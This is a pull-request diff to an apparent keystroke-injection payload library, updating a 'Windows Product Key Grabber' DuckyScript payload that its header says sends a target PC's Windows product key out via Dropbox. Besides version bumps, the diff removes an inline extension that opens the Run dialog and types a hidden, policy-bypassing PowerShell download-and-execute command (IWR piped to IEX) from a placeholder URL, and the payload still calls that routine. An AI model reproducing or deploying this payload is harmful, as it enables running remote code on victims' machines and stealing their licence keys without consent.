Merge pull request #474 from PlumpyTurkey/master

Fix “Windows Product Key Grabber” payload

payloads/library/exfiltration/Windows-Product-Key-Grabber/README.md

@@ -8,7 +8,7 @@
         <img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
     </a>
     <a href="#">
-        <img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge">
+        <img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
     </a>
 </p>
 

payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt

@@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
     Author: PlumpyTurkey
     Description: This payload sends you the target PC's Windows product key via Dropbox.
     Target: Windows 10, 11
-    Version: 1.1
+    Version: 1.2
     Category: Exfiltration
 END_REM
 
@@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
     END_IF
 END_EXTENSION
 
-EXTENSION RUN_HOSTED_POWERSHELL
-    REM_BLOCK DOCUMENTATION
-        Title: Run Hosted PowerShell
-        Author: PlumpyTurkey
-        Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
-        Target: Windows 10, 11
-        Version: 1.0
-    END_REM
-
-    REM Required options:
-    DEFINE #RHP_SCRIPT_URL example.com
-
-    REM Advanced options:
-    DEFINE #RHP_DELAY 2000
-    DEFINE #RHP_ELEVATED_EXECUTION FALSE
-    DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
-
-    GUI r
-
-    DELAY #RHP_DELAY
-    STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
-
-    IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
-        CTRL SHIFT ENTER
-        DELAY #RHP_DELAY
-        LEFT
-    END_IF_DEFINED
-
-    ENTER
-
-    IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
-        ATTACKMODE OFF
-    END_IF_DEFINED
-END_EXTENSION
-
 RHP_RUN()